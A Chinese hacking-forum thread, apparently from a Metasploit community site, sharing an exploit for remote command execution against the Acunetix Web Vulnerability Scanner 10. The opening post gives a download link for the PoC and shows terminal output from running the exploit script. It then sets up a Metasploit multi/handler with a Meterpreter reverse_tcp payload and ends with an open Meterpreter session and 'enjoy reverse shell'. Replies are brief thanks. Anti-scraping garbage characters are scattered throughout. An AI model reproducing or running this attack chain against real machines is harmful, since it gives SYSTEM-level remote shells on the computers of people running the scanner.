Metasploit渗透测试论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

安络长矛深度安全检测系统
Metascan metasploit pro
查看: 4225|回复: 8

Acunetix Web Vulnerability Scanner 10 远程溢出 没人发我就发了

[复制链接]

22

主题

1

好友

1551

积分

正式会员

Rank: 2

活跃会员 突出贡献

发表于 2016-5-14 05:45:41 |显示全部楼层
本帖最后由 白菜 于 2016-5-23 13:28 编辑
* }: ^7 o7 k3 t/ u4 v% k  X4 V! m" M1 C: |1 |" W# n9 M
poc 下载 链接: http://pan.baidu.com/s/1dENCnJz 密码:
游客,如果您要查看本帖隐藏内容请回复

( n  J, J( L0 U6 G3 m" [演示图片下载 http://pan.baidu.com/s/1o7Uf45k
! A9 j% w. C! @5 v( ]" |- {metasploit兴趣群:537620869 欢迎加入
: ^2 K5 W5 l/ l  ^! o* u
* `* r; ^3 ~+ S5 M2 {* v7 ~/ p; v! Z
root@kali:~# python acu0day.py  9999 172.16.24.1
6 H9 u1 w, L) v4 N6 x9 Z  n. {9 d; g' y1 N  g$ G. x
Acunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)
2 f9 N! K5 ~7 e2 SPayload: Meterpreter reverse TCP 44449 B2 a& |: {  k, S2 @( q
Exploit started on port *:9999% |3 _4 i! P% R. y: r/ A5 Z
[+] Waiting for scanner... Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_2 sending (5068) bytes ! Sleeping 1 minutes to elevate privileges...ZzZz
) t. t, ]% Q# g2 T# L[!] Stopping server !* c8 G9 ?4 n% v3 z  O# a% P# z
[!] Exploit successful wait for session!" a, d4 p) E- d1 o, h5 @
Then start a metasploit session and listen on port 4444' s: W2 R8 }( Q9 l
( \3 O& S" y8 m
msf exploit(handler) > show options( v& V( c! T" j4 R

" ?5 F# z  c! H% @$ NModule options (exploit/multi/handler):
) |8 M1 {2 S/ q; @, i& C. h9 n& w3 C9 J* R2 X$ j" g- S5 q; u9 _
   Name  Current Setting  Required  Description
" Q& {" [1 ^* c% y$ i   ----  ---------------  --------  -----------: H6 c7 z+ A4 I: _
) V- Y9 t0 t& j( W6 W1 G
2 a" _) l: i- S5 ?; m; b2 L; ?
Payload options (windows/meterpreter/reverse_tcp):
' Q6 g2 M: K% J0 T* c  {
; P2 @& z( q' D% W- G7 }   Name      Current Setting  Required  Description
5 z9 N0 y# I2 ~1 B& m' g' F. l   ----      ---------------  --------  -----------
5 L. `: P+ {7 p1 J' w   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
% }7 C. _) W3 Q2 B2 V   LHOST     0.0.0.0          yes       The listen address+ m( l. h) _/ k2 e4 |3 K
   LPORT     4444             yes       The listen port
" U6 C% f: `+ }1 B! A" [+ }/ p; x4 S, @- q& ?

" }' g: m* a( N  NExploit target:1 U' [0 C6 d& J2 `7 T7 q

( Y9 N/ T* c; h1 x   Id  Name  A6 D" h# u  i( m' h% i
   --  ----
5 v0 R, M; e- n: [   0   Wildcard Target
: d# V/ n& C: ~# |Start a new scan with Acunetix using your local ip and enjoy reverse shell!
5 m( Z+ x6 h3 p  O; k
8 \9 V2 [% N9 S  v, F/ E% i2 Jmsf exploit(handler) > run
* p$ Q. U$ u8 H/ r4 i Started reverse TCP handler on 0.0.0.0:4444 Starting the payload handler... Sending stage (957487 bytes) to 172.16.24.192 Meterpreter session 1 opened (172.16.24.1:4444 -> 172.16.24.192:51782) at 2016-05-02 15:02:31 +02005 B0 r2 R; y) g$ [

; g- E$ X) b5 J7 e  e1 b2 }5 n7 kmeterpreter >2 U( h6 Y$ ^( q: Q9 s

如文中未特别声明转载请注明出自:http://www.metasploit.cn/

0

主题

0

好友

114

积分

正式会员

Rank: 2

发表于 2016-5-14 15:50:35 |显示全部楼层
老规矩,先回后下!!!!!!!
3 I$ `0 @4 T7 `# n: e  B9 h. ^

22

主题

0

好友

514

积分

禁止访问

发表于 2016-5-16 08:31:21 |显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

17

主题

0

好友

984

积分

正式会员

Rank: 2

发表于 2016-5-24 15:54:11 |显示全部楼层
我擦,烂白菜

0

主题

1

好友

2220

积分

正式会员

Rank: 2

发表于 2016-5-31 20:53:39 |显示全部楼层
学习学习!!!

0

主题

1

好友

622

积分

正式会员

Rank: 2

发表于 2016-6-2 16:35:17 |显示全部楼层
学习一下!

0

主题

1

好友

53

积分

正式会员

Rank: 2

发表于 2016-6-6 16:46:08 |显示全部楼层
谢谢 ,就是现在不能在线升级了

2

主题

0

好友

190

积分

正式会员

Rank: 2

发表于 2016-8-31 09:06:16 |显示全部楼层
好好学习天天学习

4

主题

0

好友

153

积分

正式会员

Rank: 2

发表于 2017-5-1 03:05:49 来自手机 |显示全部楼层
xjfjcjcjcjrjrjrjrjjfjccjfnfnfnjfjffj
*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

QQ|Archiver|手机版|Metasploit ( 粤ICP备15008156号-1 )

GMT+8, 2017-6-23 23:29 , Processed in 0.348391 second(s), 29 queries .

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部